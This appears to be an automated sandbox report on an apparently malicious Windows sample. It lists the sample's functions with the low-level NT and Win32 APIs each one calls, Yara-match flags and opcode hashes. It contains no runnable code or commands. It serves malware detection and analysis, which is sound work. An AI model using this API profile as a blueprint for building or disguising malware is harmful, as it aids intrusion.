                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 2MA$2MA
                                            • API String ID: 2738559852-947276439
                                            • Opcode ID: 7cb797a4648654f9c36386807668f01cbbea895ef48dca5442601e28b76a4ffd
                                            • Instruction ID: 309e663c3c10343e76460058d14a4be095236feac1fe349f18dce279ef360c98
                                            • Opcode Fuzzy Hash: 7cb797a4648654f9c36386807668f01cbbea895ef48dca5442601e28b76a4ffd
                                            • Instruction Fuzzy Hash: FCF01DB2200104AFCB14DF99DC90EEB77ADEF8C354F018649FA0DA7241D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 2MA$2MA
                                            • API String ID: 2738559852-947276439
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: 3e9e983e6984eef08560939f573eda12603e966cfb098a8ce2531ea6838527ca
                                            • Instruction ID: 702c58f1854d67498ef51f9c7af658d37d33122ca1eb87eacba7027cf8134d59
                                            • Opcode Fuzzy Hash: 3e9e983e6984eef08560939f573eda12603e966cfb098a8ce2531ea6838527ca
                                            • Instruction Fuzzy Hash: EA01B6B6201108AFCB08CF98DC94EEB37BAAF8C754F158249FA1D97241C630F855CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A0FA, Relevance: 1.6, APIs: 1, Instructions: 51memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: eca4ecc5cef4c79ca22c34f19f597183cc8d510b4c089e9fa72b52b997029c3f
                                            • Instruction ID: 25b07ece68f0308ff562086e19bffdc59da77cc737aabec55dd6d4d5bf01c03a
                                            • Opcode Fuzzy Hash: eca4ecc5cef4c79ca22c34f19f597183cc8d510b4c089e9fa72b52b997029c3f
                                            • Instruction Fuzzy Hash: F6011EB5604209ABCB04DF99DC81EEB77AEAF88714F14854EFE1897241D635F821CBB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                            • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                            • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ee0800bb13fb05b644fae76efc942d01db61e4775d7ab6232359b5d70e235494
                                            • Instruction ID: 7152289efcecd1e579bed34ea66e70d25c08598d725ddab40c3a09e80c529b66
                                            • Opcode Fuzzy Hash: ee0800bb13fb05b644fae76efc942d01db61e4775d7ab6232359b5d70e235494
                                            • Instruction Fuzzy Hash: 5290026164101502D20171595404616100A97D0391FA1C032A5015555FCA658992F171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4bc30fa11ad277fc85b87ab9c0b2d6dabb8a1d2e57693f557d33a32b70633b15
                                            • Instruction ID: fd6cc2a82ce1e00c6aead5ea14a8314bbae3fb8efa22d5c273d816d52812bd13
                                            • Opcode Fuzzy Hash: 4bc30fa11ad277fc85b87ab9c0b2d6dabb8a1d2e57693f557d33a32b70633b15
                                            • Instruction Fuzzy Hash: A290027124101413D21161595504707100997D0391FA1C422A4415558E96968952F161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4c7f500221406042b0bda1837470f5f00e6f4f9c3181c62c8c175688dc6bc6c7
                                            • Instruction ID: 5bf00c407f6d57ed3c4e94b182aea61a89391788cecda40caa12c568de0652cc
                                            • Opcode Fuzzy Hash: 4c7f500221406042b0bda1837470f5f00e6f4f9c3181c62c8c175688dc6bc6c7
                                            • Instruction Fuzzy Hash: 70900261282051525645B15954045075006A7E03917A1C022A5405950D85669856F661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b582585c4d47cb640f2abd80830bb840fc4b0b0a194b69e45b2b351bde4c9938
                                            • Instruction ID: 6a20f027179b830497ef7b78e6aa1aefc6fe6a148c7a45ea8917fdf0c84a23e5
                                            • Opcode Fuzzy Hash: b582585c4d47cb640f2abd80830bb840fc4b0b0a194b69e45b2b351bde4c9938
                                            • Instruction Fuzzy Hash: 289002A124201003420571595414616500A97E0351B61C031E5005590EC5658891B165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ec145657d337dd839362db05a34d4f6a7d05fc4d548b25e03cc75bc678d3f07a
                                            • Instruction ID: 343a67c3b450eda57c539f642b58dfb6ae8ab2b73c9f249f10cfa7fe97204bf1
                                            • Opcode Fuzzy Hash: ec145657d337dd839362db05a34d4f6a7d05fc4d548b25e03cc75bc678d3f07a
                                            • Instruction Fuzzy Hash: 789002A138101442D20061595414B061005D7E1351F61C025E5055554E8659CC52B166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 854dbf144d60e5029cc2e65f01e183e2b63d6236e870ba560a0df5cfd904fd00
                                            • Instruction ID: f34262161de44c28e3173e7b87e51ddb46e91f33ccf01d53a24cea63ebea9a0b
                                            • Opcode Fuzzy Hash: 854dbf144d60e5029cc2e65f01e183e2b63d6236e870ba560a0df5cfd904fd00
                                            • Instruction Fuzzy Hash: 54900265251010030205A5591704507104697D53A1361C031F5006550DD6618861B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: af96a081c1eed4d35bad752210a24174e9b129b8b142028853dac71041a6b1df
                                            • Instruction ID: 70bb5a229a7d8f7192e5b09f463ab7c73d4a6ec44531cffa60f1c41fba516a1c
                                            • Opcode Fuzzy Hash: af96a081c1eed4d35bad752210a24174e9b129b8b142028853dac71041a6b1df
                                            • Instruction Fuzzy Hash: 1B9002B124101402D24071595404746100597D0351F61C021A9055554F86998DD5B6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 42b0c3fd263b3f2b23f00bf3bd26ca2801baa1c4346ffe882a101849124a4365
                                            • Instruction ID: c7c5e46bdc2cfebc122c57017433def25c08ae453da44bd56e7e61d1d51281c9
                                            • Opcode Fuzzy Hash: 42b0c3fd263b3f2b23f00bf3bd26ca2801baa1c4346ffe882a101849124a4365
                                            • Instruction Fuzzy Hash: 4190027124109802D2106159940474A100597D0351F65C421A8415658E86D58891B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a952ae09c804d69492a1bcc182722b69da4b3992736e9d6806e960b9a3ca1cb1
                                            • Instruction ID: 6a364ba85c8f772d4b2886b4f2b6492069d3cadb8bf511b00c9627d15c6db6d8
                                            • Opcode Fuzzy Hash: a952ae09c804d69492a1bcc182722b69da4b3992736e9d6806e960b9a3ca1cb1
                                            • Instruction Fuzzy Hash: 5290027124101802D2807159540464A100597D1351FA1C025A4016654ECA558A59B7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 09436fe137f92246a6a4d46354200e0399203aff66c518921ac9cb39197b2e0d
                                            • Instruction ID: c735856600ad4b35c9bc3feebd914bacdfa6366121527cdfa1a97d1552e357b9
                                            • Opcode Fuzzy Hash: 09436fe137f92246a6a4d46354200e0399203aff66c518921ac9cb39197b2e0d
                                            • Instruction Fuzzy Hash: DF90026125181042D30065695C14B07100597D0353F61C125A4145554DC9558861B561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 51f777530e10a5759875b96dde1ec641228d7a081f942b01bb45cfa12f890701
                                            • Instruction ID: b38e262d558f8a08140874b7f2c9a58e8b5c97e73828e73d02eabe2c7ad3b49e
                                            • Opcode Fuzzy Hash: 51f777530e10a5759875b96dde1ec641228d7a081f942b01bb45cfa12f890701
                                            • Instruction Fuzzy Hash: 8D900261641010424240716998449065005BBE1361761C131A4989550E85998865B6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a3e24e01fab16767a7a2a403ed181282d8d416c3857439131eaa0d98b66136ba
                                            • Instruction ID: 71657dbcb7a653d25fc3f42d08dd3ebde1644d0a8d141c4a637c608f8ba695dd
                                            • Opcode Fuzzy Hash: a3e24e01fab16767a7a2a403ed181282d8d416c3857439131eaa0d98b66136ba
                                            • Instruction Fuzzy Hash: 7490027124141402D2006159581470B100597D0352F61C021A5155555E86658851B5B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d61570e463dbeaaf1c56828ecdce5700041022b645b85e2d58d97e6b47fce647
                                            • Instruction ID: 3db430581583249cb1f1de6c6df72e9efc4889e82484adf5b692e33dfa45f7c4
                                            • Opcode Fuzzy Hash: d61570e463dbeaaf1c56828ecdce5700041022b645b85e2d58d97e6b47fce647
                                            • Instruction Fuzzy Hash: 9390026134101003D240715964186065005E7E1351F61D021E4405554DD9558856B262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 786828a0acd8c2fea2f436577c9dc2a24eb1012cd9be6766f390987788c3b171
                                            • Instruction ID: a2ad11d04f450e04eb7aa8e721a12763ad157d8d5b91105616d43ae4db23efa5
                                            • Opcode Fuzzy Hash: 786828a0acd8c2fea2f436577c9dc2a24eb1012cd9be6766f390987788c3b171
                                            • Instruction Fuzzy Hash: 6A90026925301002D2807159640860A100597D1352FA1D425A4006558DC9558869B361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8ba88932508930ec404e5ce4b0d269f19b2b4ec65850eedc65d089fc2d2cf9dc
                                            • Instruction ID: 1e9e74182e5b243d5136deb70def7ef58487d0d30ac54e072b39eb5a61257c78
                                            • Opcode Fuzzy Hash: 8ba88932508930ec404e5ce4b0d269f19b2b4ec65850eedc65d089fc2d2cf9dc
                                            • Instruction Fuzzy Hash: A690027124101402D20065996408646100597E0351F61D021A9015555FC6A58891B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
                                            • Instruction ID: bf50d6615e3a851f47153e1852c589cd20b96e00f5eebf3b99f7dff6005f4db2
                                            • Opcode Fuzzy Hash: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
                                            • Instruction Fuzzy Hash: 6E213AB2D4020857CB15DA65AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: oLA
                                            • API String ID: 1279760036-3789366272
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082B3, Relevance: 1.6, APIs: 1, Instructions: 78threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 50ab5d65a82f1ee734a8f406188209520459377b56ed78ca5bb1b463511ebf9f
                                            • Instruction ID: c40528b946b6344bae922bf7c762eb89f40c10a75b0eebf6d9f0bc8fe3218747
                                            • Opcode Fuzzy Hash: 50ab5d65a82f1ee734a8f406188209520459377b56ed78ca5bb1b463511ebf9f
                                            • Instruction Fuzzy Hash: 9D117B72A003582AEB216A755C02FFB735C9B40B14F0401AFFD48E61C3E979692542E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 22808c9a6357a2d9ab37cda6e069c75f9b6d1e39fad383c0320d819e41c31d1c
                                            • Instruction ID: 96d98e1fe2f98842fc83c6cd6c1157d573f9294eba15b07b7d3dc8a54a871539
                                            • Opcode Fuzzy Hash: 22808c9a6357a2d9ab37cda6e069c75f9b6d1e39fad383c0320d819e41c31d1c
                                            • Instruction Fuzzy Hash: C701F931A802247AE721A6949D02FFE671CAB90F54F04401EFF04BA1C1E6B9291546F9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                            • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                            • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                            • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A222, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: e396ccebe30fad2e988d8527e7b7f15757aef1859d7409b0927e68f34e739be1
                                            • Instruction ID: 5a7de383100ea6807273ed0c0024f7dd2abc06077e5bc5f6b1051abbdc3906b7
                                            • Opcode Fuzzy Hash: e396ccebe30fad2e988d8527e7b7f15757aef1859d7409b0927e68f34e739be1
                                            • Instruction Fuzzy Hash: 50E06D712002146BC714DF95CC59ED73B6DEF88254F004159F9099B341C235EA14CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
